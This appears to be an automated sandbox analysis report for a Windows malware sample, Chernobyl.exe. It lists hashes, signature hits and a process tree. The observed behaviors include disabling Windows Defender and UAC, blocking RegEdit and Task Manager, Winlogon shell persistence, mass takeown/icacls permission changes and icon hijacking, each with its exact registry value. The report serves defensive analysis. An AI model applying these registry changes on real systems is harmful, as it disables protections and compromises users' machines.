Analysis
-
max time kernel
87s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-03-2024 02:34
Static task
static1
Behavioral task
behavioral1
Sample
Chernobyl.exe
Resource
win7-20240221-en
Errors
General
-
Target
Chernobyl.exe
-
Size
418KB
-
MD5
42d232a366705a95af9babb269a251b1
-
SHA1
015b04d84cf13b8c93d11cc8c80a0f4571fb6847
-
SHA256
97609ae0b6b53252439d92caf6261c32cad76a69c93047c336cc5c42b458af3d
-
SHA512
cc7a88709390ec82c94c587f2569c22c72a210298e14d77a0ad0ab633013d49af703d1fe77af904c272914885597442474a2c487d5a9bd2553de794a3ee1ce56
-
SSDEEP
6144:MEgbPPJo0222222222222222222222222222222222222222222222222222222Z:LtH0ZOZzv4TatsNqaJx
Malware Config
Signatures
-
Contains code to disable Windows Defender 3 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral1/memory/1724-0-0x000000013F5A0000-0x000000013F60C000-memory.dmp disable_win_def behavioral1/memory/1724-2-0x000000001BD00000-0x000000001BD80000-memory.dmp disable_win_def behavioral1/memory/1724-4-0x000000001BD00000-0x000000001BD80000-memory.dmp disable_win_def -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, cluttscape.exe" Chernobyl.exe -
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Chernobyl.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 64 IoCs
Processes:
icacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exepid process 712 icacls.exe 2776 icacls.exe 4956 takeown.exe 5152 takeown.exe 5428 takeown.exe 4248 takeown.exe 3036 icacls.exe 6244 takeown.exe 7900 2944 2648 takeown.exe 5260 takeown.exe 3224 takeown.exe 4620 2864 icacls.exe 6372 takeown.exe 2588 4312 1852 icacls.exe 2152 takeown.exe 2576 icacls.exe 4912 takeown.exe 5496 icacls.exe 6696 2272 takeown.exe 1656 icacls.exe 2464 takeown.exe 7016 takeown.exe 7528 takeown.exe 7164 takeown.exe 656 takeown.exe 7840 752 takeown.exe 1948 icacls.exe 1636 takeown.exe 740 takeown.exe 5704 takeown.exe 6348 7588 takeown.exe 2736 2064 takeown.exe 1364 icacls.exe 2668 takeown.exe 1700 icacls.exe 6180 takeown.exe 2008 takeown.exe 1956 takeown.exe 6164 takeown.exe 1736 icacls.exe 2960 takeown.exe 2624 icacls.exe 3312 icacls.exe 6452 icacls.exe 8184 5308 1144 icacls.exe 756 icacls.exe 2760 takeown.exe 2876 icacls.exe 6656 icacls.exe 7864 2008 2868 takeown.exe 1900 takeown.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exepid process 5248 icacls.exe 7572 icacls.exe 5724 1948 icacls.exe 3588 takeown.exe 7520 takeown.exe 7556 icacls.exe 5848 1852 icacls.exe 2644 takeown.exe 2632 takeown.exe 7604 takeown.exe 7832 5576 takeown.exe 5132 takeown.exe 1528 icacls.exe 1900 takeown.exe 1728 takeown.exe 5456 takeown.exe 4220 1696 takeown.exe 1608 icacls.exe 2820 icacls.exe 2776 icacls.exe 3824 takeown.exe 7488 icacls.exe 1796 1460 takeown.exe 8076 2172 takeown.exe 4716 takeown.exe 1676 icacls.exe 2624 icacls.exe 612 takeown.exe 2688 takeown.exe 4252 takeown.exe 5460 takeown.exe 3592 takeown.exe 6308 takeown.exe 2760 takeown.exe 7400 takeown.exe 7856 3816 5412 takeown.exe 7040 1448 takeown.exe 1700 icacls.exe 2776 icacls.exe 7512 takeown.exe 8168 2152 takeown.exe 108 icacls.exe 2100 icacls.exe 2956 takeown.exe 6180 takeown.exe 7284 takeown.exe 1796 takeown.exe 1688 icacls.exe 4928 takeown.exe 448 1624 takeown.exe 4220 takeown.exe 2596 4088 icacls.exe -
Modifies system executable filetype association 2 TTPs 3 IoCs
Processes:
Chernobyl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe -
Processes:
Chernobyl.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" Chernobyl.exe -
Drops file in System32 directory 2 IoCs
Processes:
Chernobyl.exedescription ioc process File opened for modification C:\Windows\System32\kill.ico Chernobyl.exe File opened for modification C:\Windows\System32\wallpaper.jpg Chernobyl.exe -
Drops file in Windows directory 2 IoCs
Processes:
Chernobyl.exedescription ioc process File created C:\Windows\cluttscape.exe Chernobyl.exe File opened for modification C:\Windows\cluttscape.exe Chernobyl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies File Icons 3 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\4 = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe -
Modifies registry class 39 IoCs
Processes:
Chernobyl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5} Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Unknown\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B} Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\CLSID Chernobyl.exe Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Chernobyl.exepid process 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe 1724 Chernobyl.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Chernobyl.exepid process 1724 Chernobyl.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Chernobyl.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 1724 Chernobyl.exe Token: SeDebugPrivilege 1724 Chernobyl.exe Token: SeTakeOwnershipPrivilege 2272 takeown.exe Token: SeTakeOwnershipPrivilege 2972 takeown.exe Token: SeTakeOwnershipPrivilege 2064 takeown.exe Token: SeTakeOwnershipPrivilege 2628 takeown.exe Token: SeTakeOwnershipPrivilege 2448 takeown.exe Token: SeTakeOwnershipPrivilege 1012 takeown.exe Token: SeTakeOwnershipPrivilege 2760 takeown.exe Token: SeTakeOwnershipPrivilege 2772 takeown.exe Token: SeTakeOwnershipPrivilege 2464 takeown.exe Token: SeTakeOwnershipPrivilege 2696 takeown.exe Token: SeTakeOwnershipPrivilege 2548 takeown.exe Token: SeTakeOwnershipPrivilege 1792 takeown.exe Token: SeTakeOwnershipPrivilege 268 takeown.exe Token: SeTakeOwnershipPrivilege 1796 takeown.exe Token: SeTakeOwnershipPrivilege 2912 takeown.exe Token: SeTakeOwnershipPrivilege 568 takeown.exe Token: SeTakeOwnershipPrivilege 2868 takeown.exe Token: SeTakeOwnershipPrivilege 1456 takeown.exe Token: SeTakeOwnershipPrivilege 2920 takeown.exe Token: SeTakeOwnershipPrivilege 2276 takeown.exe Token: SeTakeOwnershipPrivilege 3048 takeown.exe Token: SeTakeOwnershipPrivilege 2788 takeown.exe Token: SeTakeOwnershipPrivilege 2592 takeown.exe Token: SeTakeOwnershipPrivilege 1564 takeown.exe Token: SeTakeOwnershipPrivilege 2620 takeown.exe Token: SeTakeOwnershipPrivilege 1580 takeown.exe Token: SeTakeOwnershipPrivilege 1704 takeown.exe Token: SeTakeOwnershipPrivilege 332 takeown.exe Token: SeTakeOwnershipPrivilege 1448 takeown.exe Token: SeTakeOwnershipPrivilege 1808 takeown.exe Token: SeTakeOwnershipPrivilege 2668 takeown.exe Token: SeTakeOwnershipPrivilege 1900 takeown.exe Token: SeTakeOwnershipPrivilege 2632 takeown.exe Token: SeTakeOwnershipPrivilege 1972 takeown.exe Token: SeTakeOwnershipPrivilege 3048 takeown.exe Token: SeTakeOwnershipPrivilege 1648 takeown.exe Token: SeTakeOwnershipPrivilege 2080 takeown.exe Token: SeTakeOwnershipPrivilege 2232 takeown.exe Token: SeTakeOwnershipPrivilege 908 takeown.exe Token: SeTakeOwnershipPrivilege 2776 takeown.exe Token: SeTakeOwnershipPrivilege 2528 takeown.exe Token: SeTakeOwnershipPrivilege 2008 takeown.exe Token: SeTakeOwnershipPrivilege 2460 takeown.exe Token: SeTakeOwnershipPrivilege 1624 takeown.exe Token: SeTakeOwnershipPrivilege 2960 takeown.exe Token: SeTakeOwnershipPrivilege 2780 takeown.exe Token: SeTakeOwnershipPrivilege 1732 takeown.exe Token: SeTakeOwnershipPrivilege 2632 takeown.exe Token: SeTakeOwnershipPrivilege 1516 takeown.exe Token: SeTakeOwnershipPrivilege 2616 takeown.exe Token: SeTakeOwnershipPrivilege 740 takeown.exe Token: SeTakeOwnershipPrivilege 1484 takeown.exe Token: SeTakeOwnershipPrivilege 976 takeown.exe Token: SeTakeOwnershipPrivilege 1564 takeown.exe Token: SeTakeOwnershipPrivilege 2648 takeown.exe Token: SeTakeOwnershipPrivilege 2220 takeown.exe Token: SeTakeOwnershipPrivilege 904 takeown.exe Token: SeTakeOwnershipPrivilege 2008 takeown.exe Token: SeTakeOwnershipPrivilege 2228 takeown.exe Token: SeTakeOwnershipPrivilege 108 takeown.exe Token: SeTakeOwnershipPrivilege 2692 takeown.exe Token: SeTakeOwnershipPrivilege 1700 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Chernobyl.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1724 wrote to memory of 1684 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 1684 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 1684 1724 Chernobyl.exe cmd.exe PID 1684 wrote to memory of 2860 1684 cmd.exe rundll32.exe PID 1684 wrote to memory of 2860 1684 cmd.exe rundll32.exe PID 1684 wrote to memory of 2860 1684 cmd.exe rundll32.exe PID 1724 wrote to memory of 2864 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 2864 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 2864 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 880 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 880 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 880 1724 Chernobyl.exe cmd.exe PID 2864 wrote to memory of 1212 2864 cmd.exe rundll32.exe PID 2864 wrote to memory of 1212 2864 cmd.exe rundll32.exe PID 2864 wrote to memory of 1212 2864 cmd.exe rundll32.exe PID 1724 wrote to memory of 2984 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 2984 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 2984 1724 Chernobyl.exe cmd.exe PID 880 wrote to memory of 2308 880 cmd.exe rundll32.exe PID 880 wrote to memory of 2308 880 cmd.exe rundll32.exe PID 880 wrote to memory of 2308 880 cmd.exe rundll32.exe PID 1724 wrote to memory of 2276 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 2276 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 2276 1724 Chernobyl.exe cmd.exe PID 2984 wrote to memory of 2840 2984 cmd.exe rundll32.exe PID 2984 wrote to memory of 2840 2984 cmd.exe rundll32.exe PID 2984 wrote to memory of 2840 2984 cmd.exe rundll32.exe PID 1724 wrote to memory of 2244 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 2244 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 2244 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 2288 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 2288 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 2288 1724 Chernobyl.exe cmd.exe PID 2276 wrote to memory of 692 2276 cmd.exe rundll32.exe PID 2276 wrote to memory of 692 2276 cmd.exe rundll32.exe PID 2276 wrote to memory of 692 2276 cmd.exe rundll32.exe PID 2244 wrote to memory of 896 2244 cmd.exe rundll32.exe PID 2244 wrote to memory of 896 2244 cmd.exe rundll32.exe PID 2244 wrote to memory of 896 2244 cmd.exe rundll32.exe PID 1724 wrote to memory of 1072 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 1072 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 1072 1724 Chernobyl.exe cmd.exe PID 2288 wrote to memory of 2912 2288 cmd.exe rundll32.exe PID 2288 wrote to memory of 2912 2288 cmd.exe rundll32.exe PID 2288 wrote to memory of 2912 2288 cmd.exe rundll32.exe PID 1072 wrote to memory of 1792 1072 cmd.exe rundll32.exe PID 1072 wrote to memory of 1792 1072 cmd.exe rundll32.exe PID 1072 wrote to memory of 1792 1072 cmd.exe rundll32.exe PID 1724 wrote to memory of 1452 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 1452 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 1452 1724 Chernobyl.exe cmd.exe PID 1452 wrote to memory of 1864 1452 cmd.exe rundll32.exe PID 1452 wrote to memory of 1864 1452 cmd.exe rundll32.exe PID 1452 wrote to memory of 1864 1452 cmd.exe rundll32.exe PID 1724 wrote to memory of 3032 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 3032 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 3032 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 448 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 448 1724 Chernobyl.exe cmd.exe PID 1724 wrote to memory of 448 1724 Chernobyl.exe cmd.exe PID 3032 wrote to memory of 3036 3032 cmd.exe rundll32.exe PID 3032 wrote to memory of 3036 3032 cmd.exe rundll32.exe PID 3032 wrote to memory of 3036 3032 cmd.exe rundll32.exe PID 448 wrote to memory of 2364 448 cmd.exe rundll32.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"1⤵
- Modifies WinLogon for persistence
- UAC bypass
- Disables RegEdit via registry modification
- Modifies system executable filetype association
- Checks whether UAC is enabled
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies File Icons
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1724 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:848
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:976
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1732
-
-
-
